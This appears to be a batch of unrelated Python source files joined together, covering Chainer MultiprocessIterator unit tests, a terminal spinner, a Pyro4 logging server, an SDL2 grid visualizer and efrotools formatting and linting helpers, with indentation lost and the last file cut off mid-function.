self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 6)
def test_iterator_serialize_backward_compat(self):
dataset = [1, 2, 3, 4, 5, 6]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
self.assertEqual(it.epoch, 0)
self.assertAlmostEqual(it.epoch_detail, 0 / 6)
self.assertIsNone(it.previous_epoch_detail)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
target = dict()
it.serialize(DummySerializer(target))
# older version does not have previous_epoch_detail
del target['previous_epoch_detail']
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
it.serialize(DummyDeserializer(target))
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertEqual(sorted(batch1 + batch2 + batch3), dataset)
self.assertAlmostEqual(it.epoch_detail, 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, 4 / 6)
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
}))
class TestMultiprocessIteratorOrderSamplerEpochSize(unittest.TestCase):
def setUp(self):
def order_sampler(order, cur_pos):
return numpy.repeat(numpy.arange(3), 2)
self.n_processes = 2
self.options = {'n_processes': self.n_processes,
'n_prefetch': self.n_prefetch,
'shared_mem': self.shared_mem,
'shuffle': None,
'order_sampler': order_sampler}
def test_iterator_repeat(self):
dataset = [1, 2, 3]
it = iterators.MultiprocessIterator(dataset, 2, **self.options)
for i in range(3):
self.assertEqual(it.epoch, i)
self.assertAlmostEqual(it.epoch_detail, i + 0 / 6)
if i == 0:
self.assertIsNone(it.previous_epoch_detail)
else:
self.assertAlmostEqual(it.previous_epoch_detail, i - 2 / 6)
batch1 = it.next()
self.assertEqual(len(batch1), 2)
self.assertIsInstance(batch1, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 2 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 0 / 6)
batch2 = it.next()
self.assertEqual(len(batch2), 2)
self.assertIsInstance(batch2, list)
self.assertFalse(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 4 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 2 / 6)
batch3 = it.next()
self.assertEqual(len(batch3), 2)
self.assertIsInstance(batch3, list)
self.assertTrue(it.is_new_epoch)
self.assertAlmostEqual(it.epoch_detail, i + 6 / 6)
self.assertAlmostEqual(it.previous_epoch_detail, i + 4 / 6)
self.assertEqual(
sorted(batch1 + batch2 + batch3), [1, 1, 2, 2, 3, 3])
class _NoSameIndicesOrderSampler(object):
def __init__(self, batchsize):
self.n_call = 0
def __call__(self, current_order, current_pos):
# all batches contain unique indices
remaining = current_order[current_pos:]
first = numpy.setdiff1d(numpy.arange(len(current_order)), remaining)
second = numpy.setdiff1d(numpy.arange(len(current_order)), first)
return numpy.concatenate((first, second))
class TestNoSameIndicesOrderSampler(unittest.TestCase):
def test_no_same_indices_order_sampler(self):
dataset = [1, 2, 3, 4, 5, 6]
batchsize = 5
it = iterators.MultiprocessIterator(
dataset, batchsize,
order_sampler=_NoSameIndicesOrderSampler(batchsize))
for _ in range(5):
batch = it.next()
self.assertEqual(len(numpy.unique(batch)), batchsize)
class _InvalidOrderSampler(object):
def __init__(self):
self.n_call = 0
def __call__(self, _order, _):
order = numpy.arange(len(_order) - self.n_call)
self.n_call += 1
return order
class TestMultiprocessIteratorInvalidOrderSampler(unittest.TestCase):
def test_invalid_order_sampler(self):
dataset = [1, 2, 3, 4, 5, 6]
with self.assertRaises(ValueError):
it = iterators.MultiprocessIterator(
dataset, 6, shuffle=None,
order_sampler=_InvalidOrderSampler())
it.next()
class TestMultiprocessIteratorConcurrency(unittest.TestCase):
def test_finalize_not_deadlock(self):
dataset = numpy.ones((1000, 1000))
it = iterators.MultiprocessIterator(dataset, 10, n_processes=4)
for _ in range(10):
it.next()
t = threading.Thread(target=lambda: it.finalize())
t.daemon = True
t.start()
t.join(5)
deadlock = t.is_alive()
self.assertFalse(deadlock)
class TestMultiprocessIteratorDeterminancy(unittest.TestCase):
def setUp(self):
self._seed = 3141592653
self._random_bak = numpy.random.get_state()
def tearDown(self):
numpy.random.set_state(self._random_bak)
def test_reproduce_same_permutation(self):
dataset = [1, 2, 3, 4, 5, 6]
order_sampler1 = iterators.ShuffleOrderSampler(
numpy.random.RandomState(self._seed))
it1 = iterators.MultiprocessIterator(
dataset, 6, order_sampler=order_sampler1)
order_sampler2 = iterators.ShuffleOrderSampler(
numpy.random.RandomState(self._seed))
it2 = iterators.MultiprocessIterator(
dataset, 6, order_sampler=order_sampler2)
for _ in range(5):
self.assertEqual(it1.next(), it2.next())
@testing.parameterize(*testing.product({
'n_prefetch': [1, 2],
'shared_mem': [None, 1000000],
'order_sampler': [
None, lambda order, _: numpy.random.permutation(len(order))],
}))
class TestMultiprocessIteratorInterruption(unittest.TestCase):
# unless you're debugging tests, this should be false
show_interruption_msg = False
def setUp(self):
self.code_path = None
if not self.show_interruption_msg:
self.nullfd = os.open(os.devnull, os.O_WRONLY)
def tearDown(self):
if not self.show_interruption_msg:
os.close(self.nullfd)
if self.code_path is not None:
os.remove(self.code_path)
def run_code(self, dataset, n_processes, operation):
code_template = """
import os
import random
import sys
import time
from chainer import iterators
# Using `multiprocessing` on Windows Python 2.7 requires
# that the script can be found on `sys.path`.
# See https://bugs.python.org/issue19946
sys.path.append(os.path.dirname(__file__))
class InfiniteWaitDataSet(object):
def __len__(self):
return 1000000
def __getitem__(self, _):
time.sleep(1000000)
infinite_wait = InfiniteWaitDataSet()
class NoWaitDataSet(object):
def __len__(self):
return 1000000
def __getitem__(self, _):
return 0
no_wait = NoWaitDataSet()
if __name__ == '__main__':
if {shared_mem} is not None and {dataset} is infinite_wait:
iterators.MultiprocessIterator._interruption_testing = True
it = iterators.MultiprocessIterator({dataset}, 100,
shuffle={shuffle},
n_processes={n_processes},
n_prefetch={n_prefetch},
shared_mem={shared_mem},
order_sampler={order_sampler})
{operation}
"""
code = code_template.format(dataset=dataset,
shuffle=None,
n_processes=n_processes,
n_prefetch=self.n_prefetch,
shared_mem=self.shared_mem,
order_sampler=self.order_sampler,
operation=operation)
fd, self.code_path = tempfile.mkstemp(suffix='.py')
os.write(fd, six.b(code))
os.close(fd)
if self.shared_mem is not None and dataset == 'infinite_wait':
stdout = subprocess.PIPE
else:
stdout = None
stderr = None if self.show_interruption_msg else self.nullfd
self.p = subprocess.Popen([sys.executable, self.code_path],
stdout=stdout, stderr=stderr)
if stdout is None:
self.child_pids = []
else:
self.child_pids = list(map(int, self.p.stdout.readline().split()))
def send_sigint(self):
# `signal.CTRL_C_EVENT` is also sent to the test process itself.
# See https://docs.python.org/3.6/library/os.html#os.kill
# So we need to wait for the signal and ignore it.
# We can NOT ignore the signal by modifying the signal handler here.
# If we temporarily ignore the signal, it will be sent again
# when the signal handler is restored.
# If we ignore the signal permanently, we can't interrupt the test.
if os.name == 'nt':
try:
os.kill(self.p.pid, signal.CTRL_C_EVENT)
while True:
pass
except KeyboardInterrupt:
pass
else:
os.kill(self.p.pid, signal.SIGINT)
def killall(self):
# Try waiting for the root process.
# Python 2.7 doesn't have `subprocess.TimeoutExpired`,
# so we can't use `p.wait(10)`.
for _ in range(10):
time.sleep(1)
if self.p.poll() is not None:
self.p.wait()
break
pids = [self.p.pid] + self.child_pids
was_alive = False
for pid in pids:
try:
if os.name == 'nt':
os.kill(pid, signal.SIGTERM)
else:
os.kill(pid, signal.SIGKILL)
except OSError as e:
# no such pid (unix)
if e.errno == errno.ESRCH:
pass
# process terminated but its handle remains (Windows)
elif e.errno == errno.EACCES:
pass
# process terminated and its handle erased (Windows)
elif e.errno == errno.EINVAL:
pass
else:
raise
else: # process existed and was successfully killed
was_alive = True
return was_alive
@unittest.skip
def test_interrupt_infinite_wait_batch(self):
# TODO(niboshi): See: https://github.com/chainer/chainer/issues/3383
self.run_code(dataset='infinite_wait',
n_processes=2,
operation='it.next()')
time.sleep(1.5)
self.send_sigint()
self.assertFalse(self.killall())
@unittest.skip
def test_interrupt_no_wait_batch(self):
# TODO(niboshi): See: https://github.com/chainer/chainer/issues/3383
self.run_code(dataset='no_wait',
n_processes=2,
operation='time.sleep(1000)')
time.sleep(1.5)
self.send_sigint()
self.assertFalse(self.killall())
class StallingDataset(object):
def __init__(self, nth, sleep):
self.data = [0, 1, 2, 3, 4]
self.nth = nth
self.sleep = sleep
def __len__(self):
return len(self.data)
def __getitem__(self, i):
if i == self.nth:
time.sleep(self.sleep)
return self.data[i]
@testing.parameterize(*testing.product({
'nth': [0, 1, 2], # Which item's fetch will stall?
}))
class TestMultiprocessIteratorStalledDatasetDetection(unittest.TestCase):
def test_stalled_getitem(self):
nth = self.nth
batch_size = 2
sleep = 0.5
timeout = 0.1
dataset = StallingDataset(nth, sleep)
it = iterators.MultiprocessIterator(
dataset, batch_size=batch_size, shuffle=False,
dataset_timeout=timeout, repeat=False)
# TimeoutWarning should be issued.
warning_cls = iterators.MultiprocessIterator.TimeoutWarning
data = []
# No warning until the stalling batch
for i in range(nth // batch_size):
data.append(it.next())
# Warning on the stalling batch
with testing.assert_warns(warning_cls):
data.append(it.next())
# Retrieve data until the end
while True:
try:
data.append(it.next())
except StopIteration:
break
# All data must be retrieved
assert data == [
dataset.data[i * batch_size: (i+1) * batch_size]
for i in range((len(dataset) + batch_size - 1) // batch_size)]
testing.run_module(__name__, __file__)
|
spinner.py
|
import sys
from itertools import cycle
from threading import Event, Thread
from time import sleep
from typing import Any
class Spinner:
phases: Any = cycle(["⣾", "⣷", "⣯", "⣟", "⡿", "⢿", "⣻", "⣽"])
def __init__(self) -> None:
self.stop_running: Any = Event()
self.spin_thread: Any = Thread(target=self.init_spin)
def start(self) -> None:
sys.stdout.write("\033[32m")
self.spin_thread.start()
def stop(self) -> None:
self.stop_running.set()
self.spin_thread.join()
sys.stdout.write("\033[0m")
def init_spin(self) -> None:
while not self.stop_running.is_set():
sys.stdout.write(next(self.phases))
sys.stdout.flush()
sleep(0.1)
sys.stdout.write("\b")
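# Minimal usage sketch (assumes stdout is an ANSI-capable terminal).
if __name__ == "__main__":
    spinner = Spinner()
    spinner.start()
    sleep(2)  # simulate a slow operation
    spinner.stop()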
|
plogging.py
|
import Pyro4
Pyro4.config.HMAC_KEY = 'deadbeef'
import os, threading
from Queue import Queue
socket = "/tmp/passe_logger.sock"
uri = "PYRO:logger@./u:%s" % socket
proxy = None
pid = None
def plog(tag, time):
global proxy, pid
if proxy is None or os.getpid() != pid:
pid = os.getpid()
proxy = Pyro4.Proxy(uri)
proxy.log(tag, time)
class LogServer:
def __init__(self):
self.queue = Queue()
def log(self, tag, time):
self.queue.put((tag, time))
def run_log_server():
server = LogServer()
daemon = Pyro4.Daemon(unixsocket=socket)
daemon.register(server, 'logger')
daemon_thread = threading.Thread(target = daemon.requestLoop)
daemon_thread.start()
q = server.queue
logFile = open('/tmp/passe_log', 'w')
count = 0
while(True):
count += 1
item = q.get()
logFile.write('%s,%s\n' % item)
if count % 20 == 0 or item[0] == 'req_finished':
logFile.flush()
os.fsync(logFile.fileno())
q.task_done()
if __name__ == "__main__":
run_log_server()
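# Hypothetical client-side sketch: once run_log_server() is running in a
# separate process, any other process can log through the Unix-socket
# Pyro4 proxy. The 'req_started' tag is made up; 'req_finished' triggers
# a flush in the server loop above.
#
#   from plogging import plog
#   import time
#   plog('req_started', time.time())
#   plog('req_finished', time.time())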
|
window.py
|
from threading import Thread
import numpy as np
import sdl2
from sdl2 import mouse
import sdl2.ext
from sdl2.ext import window
from sdl2.ext.sprite import Renderer
import ctypes
class Window:
def __init__(self, nbox, title="Visualizer"):
self.size = [1000, 1000]
sdl2.ext.init()
disp_hw = [(self.size[0] // nbox) * nbox] * 2
self.window = sdl2.ext.Window(title, disp_hw)
self.renderer = sdl2.ext.Renderer(self.window)
self.running = True
self.n = nbox
self.boxes = np.zeros([nbox, nbox])
self.x = ctypes.c_int(0)
self.y = ctypes.c_int(0)
self._show()
def _show(self):
self.window.show()
def _hide(self):
self.window.hide()
def _updatedelay(self, value):
if 0 < value < 100:
self.delay = value
def draw_grid(self):
size = self.size
divx = size[0] // self.n
divy = size[1] // self.n
for i in range(1, self.n):
# [x1, y1, x2, y2]
self.renderer.draw_line([i * divx, 0, i * divx, size[0]], sdl2.ext.Color())
self.renderer.draw_line([0, i * divy, size[1], i * divy], sdl2.ext.Color())
def draw_dot(self):
size = self.size
divxh = size[0] // self.n
divyh = size[1] // self.n
for i in range(self.n + 1):
for j in range(self.n + 1):
local = [(divxh // 2) + i * divxh, (divyh // 2) + j * divyh, 3, 3]
# [x1, y2, w, h]
self.renderer.fill([local], sdl2.ext.Color())
def draw_box(self):
size = self.size
divx = size[0] // self.n
divy = size[1] // self.n
for i in range(self.n + 1):
for j in range(self.n + 1):
if i == self.n or j == self.n:
rand = self.boxes[i - 1][j - 1]
else:
rand = self.boxes[i][j]
if rand == 1:
# Blue Color
color = sdl2.ext.Color(0, 0, 255)
elif rand == 2:
# Red Color
color = sdl2.ext.Color(255, 0, 0)
elif rand == 3:
# Green Color
color = sdl2.ext.Color(0, 255, 0)
else:
# Black Color
color = sdl2.ext.Color(0, 0, 0)
self.renderer.fill([i * divx, j * divy, divx, divy], color)
def _render(self, daemon=True):
while self.running and daemon is True:
self.draw_box()
self.draw_grid()
self.draw_dot()
self.renderer.present()
def events(self):
key_state = sdl2.SDL_GetKeyboardState(None)
mouse_state = sdl2.SDL_GetMouseState(ctypes.byref(self.x), ctypes.byref(self.y))
events = sdl2.ext.get_events()
for event in events:
if event.type == sdl2.SDL_QUIT:
self.running = False
return False
# elif event.type == sdl2.SDL_KEYDOWN:
# if key_state[sdl2.SDL_SCANCODE_UP]:
# self._updatedelay(self.delay + 10)
# elif key_state[sdl2.SDL_SCANCODE_DOWN]:
# self._updatedelay(self.delay - 10)
return True
def getMousePos(self):
# Poll until a mouse button is pressed, then return the current mouse
# position.
while True:
    sdl2.SDL_GetMouseState(ctypes.byref(self.x), ctypes.byref(self.y))
    for event in sdl2.ext.get_events():
        if event.type == sdl2.SDL_MOUSEBUTTONDOWN:
            return self.x.value, self.y.value
def start(self):
rendert = Thread(target=self._render)
rendert.start()
def stop(self):
self.running = False
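# Hypothetical usage sketch (assumes an SDL2-capable display). Cell values
# 1/2/3 map to blue/red/green in draw_box().
if __name__ == "__main__":
    win = Window(10)
    win.boxes[2][3] = 1      # color one cell blue
    win.start()              # render loop runs on a background thread
    while win.events():      # pump events until the window is closed
        sdl2.SDL_Delay(16)
    win.stop()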
|
code.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Functionality for formatting, linting, etc. code."""
from __future__ import annotations
import os
import subprocess
import sys
from pathlib import Path
from typing import TYPE_CHECKING
from efrotools.filecache import FileCache
if TYPE_CHECKING:
from typing import Set, List, Dict, Any, Union, Optional
def format_clang_format(projroot: Path, full: bool) -> None:
"""Run clang-format on all of our source code (multithreaded)."""
import time
import concurrent.futures
from multiprocessing import cpu_count
from efrotools import get_files_hash
os.chdir(projroot)
cachepath = Path(projroot, '.cache/format_clang_format')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
cfconfig = Path(projroot, '.clang-format')
filenames = get_code_filenames(projroot)
confighash = get_files_hash([cfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> Dict[str, Any]:
start_time = time.time()
# Note: seems os.system does not unlock the gil;
# make sure to use subprocess.
result = subprocess.call(['clang-format', '-i', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
return {'f': filename, 't': duration}
with concurrent.futures.ThreadPoolExecutor(
max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} code files.',
flush=True)
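# The checks in this module share one incremental-caching pattern, sketched
# here using only the FileCache calls seen above (check_one_file() is a
# hypothetical per-file action):
#
#   cache = FileCache(Path(projroot, '.cache/some_check'))
#   cache.update(filenames, confighash)      # drop/refresh stale entries
#   for fname in cache.get_dirty_files():    # only re-check changed files
#       check_one_file(fname)
#   cache.mark_clean(filenames)
#   cache.write()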
def check_cpplint(projroot: Path, full: bool) -> None:
"""Run cpplint on all our applicable code."""
# pylint: disable=too-many-locals, too-many-statements
import tempfile
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import getconfig, PYVER
from efro.terminal import Clr
from efro.error import CleanError
os.chdir(projroot)
filenames = get_code_filenames(projroot)
for fpath in filenames:
if ' ' in fpath:
raise Exception(f'Found space in path {fpath}; unexpected.')
# Check the config for a list of ones to ignore.
code_blacklist: List[str] = getconfig(projroot).get(
'cpplint_blacklist', [])
# Just pretend blacklisted ones don't exist.
filenames = [f for f in filenames if f not in code_blacklist]
filenames = [f for f in filenames if not f.endswith('.mm')]
cachepath = Path(projroot, '.cache/check_cpplint')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, '')
dirtyfiles = cache.get_dirty_files()
if dirtyfiles:
print(f'{Clr.BLU}CppLint checking'
f' {len(dirtyfiles)} file(s)...{Clr.RST}')
# We want to do a few custom modifications to the cpplint module...
try:
import cpplint as cpplintmodule
except Exception as exc:
raise CleanError('Unable to import cpplint.') from exc
with open(cpplintmodule.__file__) as infile:
codelines = infile.read().splitlines()
cheadersline = codelines.index('_C_HEADERS = frozenset([')
# Extra headers we consider as valid C system headers.
c_headers = [
'malloc.h', 'tchar.h', 'jni.h', 'android/log.h', 'EGL/egl.h',
'libgen.h', 'linux/netlink.h', 'linux/rtnetlink.h', 'android/bitmap.h',
'android/log.h', 'uuid/uuid.h', 'cxxabi.h', 'direct.h', 'shellapi.h',
'rpc.h', 'io.h'
]
codelines.insert(cheadersline + 1, ''.join(f"'{h}'," for h in c_headers))
# Skip unapproved C++ headers check (it flags <mutex>, <thread>, etc.)
headercheckline = codelines.index(
" if include and include.group(1) in ('cfenv',")
codelines[headercheckline] = (
" if False and include and include.group(1) in ('cfenv',")
# Skip copyright line check (our public repo code is MIT licensed
# so not crucial to keep track of who wrote exactly what)
copyrightline = codelines.index(
' """Logs an error if no Copyright'
' message appears at the top of the file."""')
codelines[copyrightline] = ' return'
# Don't complain about unknown NOLINT categories.
# (we use them for clang-tidy)
unknownlintline = codelines.index(
' elif category not in _LEGACY_ERROR_CATEGORIES:')
codelines[unknownlintline] = ' elif False:'
def lint_file(filename: str) -> None:
result = subprocess.call(
[f'python{PYVER}', '-m', 'cpplint', '--root=src', filename],
env=env)
if result != 0:
raise CleanError(
f'{Clr.RED}Cpplint failed for {filename}.{Clr.RST}')
with tempfile.TemporaryDirectory() as tmpdir:
# Write our replacement module, make it discoverable, then run.
with open(tmpdir + '/cpplint.py', 'w') as outfile:
outfile.write('\n'.join(codelines))
env = os.environ.copy()
env['PYTHONPATH'] = tmpdir
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Converting this to a list will propagate any errors.
list(executor.map(lint_file, dirtyfiles))
if dirtyfiles:
cache.mark_clean(filenames)
cache.write()
print(
f'{Clr.GRN}CppLint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
def get_code_filenames(projroot: Path) -> List[str]:
    """Return the list of files to lint-check or auto-format."""
from efrotools import getconfig
exts = ('.h', '.c', '.cc', '.cpp', '.cxx', '.m', '.mm')
places = getconfig(projroot).get('code_source_dirs', None)
if places is None:
raise RuntimeError('code_source_dirs not declared in config')
codefilenames = []
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
if any(fname.endswith(ext) for ext in exts):
codefilenames.append(os.path.join(root, fname))
codefilenames.sort()
return codefilenames
def format_yapf(projroot: Path, full: bool) -> None:
"""Runs yapf on all of our Python code."""
import time
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import cpu_count
from efrotools import get_files_hash, PYVER
os.chdir(projroot)
cachepath = Path(projroot, '.cache/format_yapf')
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
yapfconfig = Path(projroot, '.style.yapf')
filenames = get_script_filenames(projroot)
confighash = get_files_hash([yapfconfig])
cache.update(filenames, confighash)
dirtyfiles = cache.get_dirty_files()
def format_file(filename: str) -> None:
start_time = time.time()
result = subprocess.call(
[f'python{PYVER}', '-m', 'yapf', '--in-place', filename])
if result != 0:
raise Exception(f'Formatting failed for {filename}')
duration = time.time() - start_time
print(f'Formatted {filename} in {duration:.2f} seconds.')
sys.stdout.flush()
with ThreadPoolExecutor(max_workers=cpu_count()) as executor:
# Convert the futures to a list to propagate any errors even
# though there are no return values we use.
list(executor.map(format_file, dirtyfiles))
if dirtyfiles:
# Since we changed files, need to update hashes again.
cache.update(filenames, confighash)
cache.mark_clean(filenames)
cache.write()
print(f'Formatting is up to date for {len(filenames)} script files.',
flush=True)
def _should_include_script(fnamefull: str) -> bool:
fname = os.path.basename(fnamefull)
if fname.endswith('.py'):
return True
# Look for 'binary' scripts with no extensions too.
if not fname.startswith('.') and '.' not in fname:
try:
with open(fnamefull) as infile:
line = infile.readline()
if '/usr/bin/env python' in line or '/usr/bin/python' in line:
return True
except UnicodeDecodeError:
# Actual binary files will probably kick back this error.
pass
return False
def get_script_filenames(projroot: Path) -> List[str]:
"""Return the Python filenames to lint-check or auto-format."""
from efrotools import getconfig
filenames = set()
places = getconfig(projroot).get('python_source_dirs', None)
if places is None:
raise RuntimeError('python_source_dirs not declared in config')
for place in places:
for root, _dirs, files in os.walk(place):
for fname in files:
fnamefull = os.path.join(root, fname)
# Skip symlinks (we conceivably operate on the original too)
if os.path.islink(fnamefull):
continue
if _should_include_script(fnamefull):
filenames.add(fnamefull)
return sorted(list(f for f in filenames if 'flycheck_' not in f))
def runpylint(projroot: Path, filenames: List[str]) -> None:
"""Run Pylint explicitly on files."""
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
# Technically we could just run pylint standalone via command line here,
# but let's go ahead and run it inline so we're consistent with our cached
# full-project version.
_run_pylint(projroot,
pylintrc,
cache=None,
dirtyfiles=filenames,
allfiles=None)
def pylint(projroot: Path, full: bool, fast: bool) -> None:
"""Run Pylint on all scripts in our project (with smart dep tracking)."""
from efrotools import get_files_hash
from efro.terminal import Clr
pylintrc = Path(projroot, '.pylintrc')
if not os.path.isfile(pylintrc):
raise Exception('pylintrc not found where expected')
filenames = get_script_filenames(projroot)
if any(' ' in name for name in filenames):
raise Exception('found space in path; unexpected')
script_blacklist: List[str] = []
filenames = [f for f in filenames if f not in script_blacklist]
cachebasename = 'check_pylint_fast' if fast else 'check_pylint'
cachepath = Path(projroot, '.cache', cachebasename)
if full and cachepath.exists():
cachepath.unlink()
cache = FileCache(cachepath)
# Clear out entries and hashes for files that have changed/etc.
cache.update(filenames, get_files_hash([pylintrc]))
# Do a recursive dependency check and mark all files who are
# either dirty or have a dependency that is dirty.
filestates: Dict[str, bool] = {}
for fname in filenames:
_dirty_dep_check(fname, filestates, cache, fast, 0)
dirtyfiles = [k for k, v in filestates.items() if v]
# Let's sort by modification time, so ones we're actively trying
# to fix get linted first and we see remaining errors faster.
dirtyfiles.sort(reverse=True, key=lambda f: os.stat(f).st_mtime)
if dirtyfiles:
print(
f'{Clr.BLU}Pylint checking {len(dirtyfiles)} file(s)...{Clr.RST}',
flush=True)
try:
_run_pylint(projroot, pylintrc, cache, dirtyfiles, filenames)
finally:
# No matter what happens, we still want to
# update our disk cache (since some lints may have passed).
cache.write()
print(f'{Clr.GRN}Pylint: all {len(filenames)} files are passing.{Clr.RST}',
flush=True)
cache.write()
def _dirty_dep_check(fname: str, filestates: Dict[str, bool], cache: FileCache,
fast: bool, recursion: int) -> bool:
"""Recursively check a file's deps and return whether it is dirty."""
# pylint: disable=too-many-branches
if not fast:
# Check for existing dirty state (only applies in non-fast where
# we recurse infinitely).
curstate = filestates.get(fname)
if curstate is not None:
return curstate
# Ok; there's no current state for this file.
# First lets immediately mark it as clean so if a dependency of ours
# queries it we won't loop infinitely. (If we're actually dirty that
# will be reflected properly once we're done).
if not fast:
filestates[fname] = False
# If this dependency has disappeared, consider that dirty.
if fname not in cache.entries:
dirty = True
else:
cacheentry = cache.entries[fname]
# See if we ourself are dirty
if 'hash' not in cacheentry:
dirty = True
else:
# Ok we're clean; now check our dependencies..
dirty = False
# Only increment recursion in fast mode, and
# skip dependencies if we're past the recursion limit.
recursion2 = recursion
if fast:
# Our one exception is the top-level ba package, which basically aggregates the other modules.
if not fname.endswith('/ba/__init__.py'):
recursion2 += 1
if recursion2 <= 1:
deps = cacheentry.get('deps', [])
for dep in deps:
# If we have a dep that no longer exists, WE are dirty.
if not os.path.exists(dep):
dirty = True
break
if _dirty_dep_check(dep, filestates, cache, fast,
recursion2):
dirty = True
break
# Cache and return our dirty state..
# Note: for fast mode we limit to recursion==0 so we only write when
# the file itself is being directly visited.
if recursion == 0:
filestates[fname] = dirty
return dirty
def _run_pylint(projroot: Path, pylintrc: Union[Path, str],
cache: Optional[FileCache], dirtyfiles: List[str],
allfiles: Optional[List[str]]) -> Dict[str, Any]:
import time
from pylint import lint
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
args = ['--rcfile', str(pylintrc), '--output-format=colorized']
args += dirtyfiles
name = f'{len(dirtyfiles)} file(s)'
run = lint.Run(args, do_exit=False)
if cache is not None:
assert allfiles is not None
result = _apply_pylint_run_to_cache(projroot, run, dirtyfiles,
allfiles, cache)
if result != 0:
raise CleanError(f'Pylint failed for {result} file(s).')
# Sanity check: when the linter fails we should always be failing too.
# If not, it means we're probably missing something and incorrectly
# marking a failed file as clean.
if run.linter.msg_status != 0 and result == 0:
raise RuntimeError('Pylint linter returned non-zero result'
' but we did not; this is probably a bug.')
else:
if run.linter.msg_status != 0:
raise CleanError('Pylint failed.')
duration = time.time() - start_time
print(f'{Clr.GRN}Pylint passed for {name}'
f' in {duration:.1f} seconds.{Clr.RST}')
sys.stdout.flush()
return {'f': dirtyfiles, 't': duration}
def _apply_pylint_run_to_cache(projroot: Path, run: Any, dirtyfiles: List[str],
allfiles: List[str], cache: FileCache) -> int:
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
from astroid import modutils
from efrotools import getconfig
from efro.error import CleanError
# First off, build a map of dirtyfiles to module names
# (and the corresponding reverse map).
paths_to_names: Dict[str, str] = {}
names_to_paths: Dict[str, str] = {}
for fname in allfiles:
try:
mpath = modutils.modpath_from_file(fname)
mpath = _filter_module_name('.'.join(mpath))
paths_to_names[fname] = mpath
except ImportError:
# This probably means it's a tool or something not in our
# standard path. In this case just use its base name.
# (seems to be what pylint does)
dummyname = os.path.splitext(os.path.basename(fname))[0]
paths_to_names[fname] = dummyname
for key, val in paths_to_names.items():
names_to_paths[val] = key
# If there are any cyclic-import errors, just mark all deps as dirty;
# we don't want to add the logic to figure out which ones the cycles cover
# since they all seem to appear as errors for the last file in the list.
cycles: int = run.linter.stats.get('by_msg', {}).get('cyclic-import', 0)
have_dep_cycles: bool = cycles > 0
if have_dep_cycles:
print(f'Found {cycles} cycle-errors; keeping all dirty files dirty.')
# Update dependencies for what we just ran.
# A run leaves us with a map of modules to a list of the modules that
# imports them. We want the opposite though: for each of our modules
# we want a list of the modules it imports.
reversedeps = {}
# Make sure these are all proper module names; no foo.bar.__init__ stuff.
for key, val in run.linter.stats['dependencies'].items():
sval = [_filter_module_name(m) for m in val]
reversedeps[_filter_module_name(key)] = sval
deps: Dict[str, Set[str]] = {}
untracked_deps = set()
for mname, mallimportedby in reversedeps.items():
for mimportedby in mallimportedby:
if mname in names_to_paths:
deps.setdefault(mimportedby, set()).add(mname)
else:
untracked_deps.add(mname)
ignored_untracked_deps: List[str] = getconfig(projroot).get(
'pylint_ignored_untracked_deps', [])
# Add a few that this package itself triggers.
ignored_untracked_deps += ['pylint.lint', 'astroid.modutils', 'astroid']
# Ignore some specific untracked deps; complain about any others.
untracked_deps = set(dep for dep in untracked_deps
if dep not in ignored_untracked_deps)
if untracked_deps:
raise CleanError(
f'Pylint found untracked dependencies: {untracked_deps}.'
' If these are external to your project, add them to'
' "pylint_ignored_untracked_deps" in the project config.')
# Finally add the dependency lists to our entries (operate on
# everything in the run; it may not be mentioned in deps).
no_deps_modules = set()
for fname in dirtyfiles:
fmod = paths_to_names[fname]
if fmod not in deps:
# Since this code is a bit flaky, let's always announce when we
# come up empty and keep a whitelist of expected values to ignore.
no_deps_modules.add(fmod)
depsval: List[str] = []
else:
# Our deps here are module names; store paths.
